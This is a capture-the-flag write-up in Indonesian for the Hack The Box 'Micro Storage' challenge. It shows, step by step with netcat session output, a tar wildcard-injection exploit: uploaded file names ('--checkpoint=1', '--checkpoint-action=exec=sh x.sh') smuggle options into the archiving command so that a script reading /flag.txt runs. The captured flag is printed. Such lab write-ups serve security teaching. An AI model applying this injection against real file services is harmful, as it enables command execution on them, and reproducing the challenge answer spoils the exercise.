Micro Storage
Easy – Misc
By SlothSpider
Challenge Deskripsi
Some group of people seem to have made a network service that lets you store files temporarily. But little did they know about the mistake they made coding their script… Try to get familiar with their service and discover the vulnerability behind it. Your goal is to leak the contents of /𝗳𝗹𝗮𝗴.𝘁𝘅𝘁.
Initial
Di sini, saya mendapatkan IP sebagai berikut: 46.101.23.188:31894
Di sini, saya mencoba mengakses IP tersebut melalui website dan terlihat “rusak”. Saya juga mencoba melakukan Nmap dan tidak menemukan informasi yang banyak. Akhirnya, saya menggunakan netcat untuk melakukan interaksi dengan IP tersebut.
|
1 |
nc 46.101.23.188 31894 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
nc 46.101.23.188 31894 .-------------------------------------------------------------------------------------. | ___ ____ _____ _ __ _____ | | | \/ (_) / ___| | / | | _ | | | | . . |_ ___ _ __ ___ \ `--.| |_ ___ _ __ __ _ __ _ ___ __ __`| | | |/' | | | | |\/| | |/ __| '__/ _ \ `--. \ __/ _ \| '__/ _` |/ _` |/ _ \ \ \ / / | | | /| | | | | | | | | (__| | | (_) | /\__/ / || (_) | | | (_| | (_| | __/ \ V / _| |_\ |_/ / | | \_| |_/_|\___|_| \___/ \____/ \__\___/|_| \__,_|\__, |\___| \_/ \___(_)___/ | | B y H a c k T h e B o x L a b s __/ | | | |___/ | `-----------------------. .-------------------------' | Welcome to your online temporary | | Micro Storage | `-----------------------------------' \!/ WARNING \!/ Your storage only lasts during the ongoing session, once the session killed, all your files will be gone. Use this service responsibly. ---------o--------- 1 => Upload a new file (10 file(s) remaining) 2 => List your uploaded files (0 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: |
Dari netcat, saya dapat melakukan upload file, melihat file yang sudah di upload, menghapus file, mengeluarkan isi file, dan mengunduh semua file yang sudah di compress.
Setelah mencoba-coba melakukan beberapa aktivitas, terdapat sesuatu yang menarik. Ketika saya memilih opsi “1” untuk mengupload file, kita diminta untuk melakukan input nama file.
|
1 2 3 4 5 6 7 8 |
1 => Upload a new file (10 file(s) remaining) 2 => List your uploaded files (0 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: |
Ketika saya mencoba memasukkan karakter seperti “!“, “@“, “#“, “$”, kita akan diberi alert dan program akan exit.
|
1 2 3 4 5 6 7 8 9 |
1 => Upload a new file (10 file(s) remaining) 2 => List your uploaded files (0 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: !@# [-] No no no, you're trying to hack us, good bye. |
Namun, saya menemukan bahwa kita bisa memasukkan karakter “.“ dan “=”.
|
1 2 3 4 5 6 7 8 9 |
1 => Upload a new file (10 file(s) remaining) 2 => List your uploaded files (0 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: .= [*] Start typing your file content: (send 'EOF' when done) |
Di sini, saya juga mencoba menggunakan opsi 5 “5 => Compress and download all your files”. Kita akan diberikan sebuah string base64.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
1 => Upload a new file (10 file(s) remaining) 2 => List your uploaded files (0 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: TEST [*] Start typing your file content: (send 'EOF' when done) TEST EOF [+] Your file "TEST" has been saved. (5 bytes written) 1 => Upload a new file (9 file(s) remaining) 2 => List your uploaded files (1 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 5 [+] Your base64 encoded archive: VEVTVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NDQAMDAwMTc1MAAwMDAxNzUwADAwMDAwMDAwMDA1ADE0MTIzNTU2MTA1ADAxMTQ0NwAgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhciAgAHN0b3JhZ2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3RvcmFnZQAAAAAAA <DELETED> AAAA== 1 => Upload a new file (9 file(s) remaining) 2 => List your uploaded files (1 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: |
Di sini, saya mencoba untuk melakukan decode base64 dan menjadikannya sebagai tar file dan kita dapatkan file tar yang berisi file kita (Figure 1).
Di sini, saya melihat sebuah string yang menarik pada opsi ke-lima.
|
1 |
5 => Compress and download all your files |
Ketika melihat pada bagian ini dan mengetahui bahwa “semua” file akan di kompres menggunakan tar. Ketika melakukan proses kompres ini, program kemungkinan besar akan menggunakan tanda asterik (wildcard (*)). Dari penggunaan wildcard ini, terdapat sebuah vulnerability yang mungkin saja bisa kita gunakan (lihat ini).
Exploit
Untuk melakukan exploit, saya membuat 3 buah file. Pertama adalah sebuah file dengan nama “–checkpoint=1” yang saya isi dengan sembarang karakter.
|
1 2 3 4 5 6 7 8 9 10 11 |
1 => Upload a new file (10 file(s) remaining) 2 => List your uploaded files (0 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: --checkpoint=1 [*] Start typing your file content: (send 'EOF' when done) firstFile EOF [+] Your file "--checkpoint=1" has been saved. (10 bytes written) |
Kemudian, saya membuat file kedua bernama “–checkpoint-action=exec=sh x.sh” yang saya isi dengan sembarang nilai juga.
|
1 2 3 4 5 6 7 8 9 10 11 |
1 => Upload a new file (9 file(s) remaining) 2 => List your uploaded files (1 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: --checkpoint-action=exec=sh x.sh [*] Start typing your file content: (send 'EOF' when done) secondFile EOF [+] Your file "--checkpoint-action=exec=sh x.sh" has been saved. (11 bytes written) |
Kemudian saya membuat file ketiga bernama “x.sh” dengan isi sebagai berikut.
|
1 2 3 |
#!/bin/sh value=`cat /flag.txt` echo "$value"EOF |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
1 => Upload a new file (8 file(s) remaining) 2 => List your uploaded files (2 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 1 [*] Enter your file name: x.sh [*] Start typing your file content: (send 'EOF' when done) #!/bin/sh value=`cat /flag.txt` echo "$value"EOF [+] Your file "x.sh" has been saved. (45 bytes written) |
File pertama, yang dianggap sebagai command, (–checkpoint=1) digunakan untuk menentukan setiap berapa file kita akan menjalankan command pada file kedua (–checkpoint-action=exec=sh x.sh). Nama file sekaligus command kedua ini (–checkpoint-action=exec=sh x.sh) digunakan untuk melakukan eksekusi “sh x.sh” (/bin/sh x.sh) setiap mencapai checkpoint. Sedangkan file ketiga (x.sh) digunakan untuk memuat script yang akan dijalankan untuk melihat isi dari file /flag.txt.
Kita pilih menu 5 dan didapatkan flag kita.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
1 => Upload a new file (7 file(s) remaining) 2 => List your uploaded files (3 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: 5 HTB{@bus1Ng_gTf0_b1N$_c4n_b3_fUn_s0m3t1meS__r1g|-|t??!!__c4fdecf8} [+] Your base64 encoded archive: eC5zaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NDQAMDAwMTc1MAAwMDAxNzUwADAwMDAwMDAwMDU1ADE0MTIzNTUxMDQ3ADAxMTU1NQAgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhciAgAHN0b3JhZ2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAc3RvcmFnZQ <EDITED> AAAAAA== 1 => Upload a new file (7 file(s) remaining) 2 => List your uploaded files (3 file(s) uploaded so far) 3 => Delete a file 4 => Print file content 5 => Compress and download all your files 0 => Quit (you will lose your files!) >>> Choose an option: |
Kita dapatkan flag HTB{@bus1Ng_gTf0_b1N$_c4n_b3_fUn_s0m3t1meS__r1g|-|t??!!__c4fdecf8}.